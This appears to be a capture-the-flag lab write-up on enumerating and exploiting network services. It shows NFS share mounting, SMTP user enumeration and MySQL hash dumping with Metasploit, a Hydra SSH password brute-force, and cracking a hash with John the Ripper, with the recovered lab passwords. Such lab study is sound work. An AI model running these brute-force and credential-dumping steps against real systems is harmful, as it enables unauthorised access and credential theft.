# Task 3

Port Scanning with nmap

```
root@kali-virtualbox:~# /usr/sbin/showmount -e 10.10.93.52
Export list for 10.10.93.52:
/home *
```

```
root@kali-virtualbox:/tmp/mount# showmount -e 10.10.93.52
Export list for 10.10.93.52:
/home *
root@kali-virtualbox:/tmp/mount# mount -t nfs 10.10.93.52:/home /tmp/mount -nolock
root@kali-virtualbox:/tmp/mount# ;s
bash: syntax error near unexpected token `;'
root@kali-virtualbox:/tmp/mount# ls
cappucino
root@kali-virtualbox:/tmp/mount# 


```


# Task 6 Enumerating SMTP 

```
msf6 auxiliary(scanner/smtp/smtp_enum) > set threads 32
threads => 32
msf6 auxiliary(scanner/smtp/smtp_enum) > set user_file /usr/share/seclists/Usernames/top-usernames-shortlist.txt
user_file => /usr/share/seclists/Usernames/top-usernames-shortlist.txt
msf6 auxiliary(scanner/smtp/smtp_enum) > run

[*] 10.10.141.227:25      - 10.10.141.227:25 Banner: 220 polosmtp.home ESMTP Postfix (Ubuntu)
[+] 10.10.141.227:25      - 10.10.141.227:25 Users found: administrator
[*] 10.10.141.227:25      - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/smtp/smtp_enum) > 


```

# Task 7 Exploiting SMTP 

Using Hydra to crack the password of adminstrator

`hydra -t 16 -l administrator -P /opt/rockyou.txt -vV $IP ssh`

`[22][ssh] host: 10.10.141.227   login: administrator   password: alejandro`


Connect to ssh and get the flag

# task 9 Enumerating mysql

```
msf6 auxiliary(scanner/mysql/mysql_hashdump) > set password password
password => password
msf6 auxiliary(scanner/mysql/mysql_hashdump) > set rhosts 10.10.51.141
rhosts => 10.10.51.141
msf6 auxiliary(scanner/mysql/mysql_hashdump) > set username root
username => root
msf6 auxiliary(scanner/mysql/mysql_hashdump) > run

[+] 10.10.51.141:3306     - Saving HashString as Loot: root:
[+] 10.10.51.141:3306     - Saving HashString as Loot: mysql.session:*THISISNOTAVALIDPASSWORDTHATCANBEUSEDHERE
[+] 10.10.51.141:3306     - Saving HashString as Loot: mysql.sys:*THISISNOTAVALIDPASSWORDTHATCANBEUSEDHERE
[+] 10.10.51.141:3306     - Saving HashString as Loot: debian-sys-maint:*D9C95B328FE46FFAE1A55A2DE5719A8681B2F79E
[+] 10.10.51.141:3306     - Saving HashString as Loot: root:*2470C0C06DEE42FD1618BB99005ADCA2EC9D1E19
[+] 10.10.51.141:3306     - Saving HashString as Loot: carl:*EA031893AA21444B170FC2162A56978B8CEECE18
[*] 10.10.51.141:3306     - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed


```

crack hash with john
`john hash.txt`

```
Proceeding with incremental:ASCII
doggie           (carl)

```

ssh to carl at IP with doggie as password, cat the file to get flag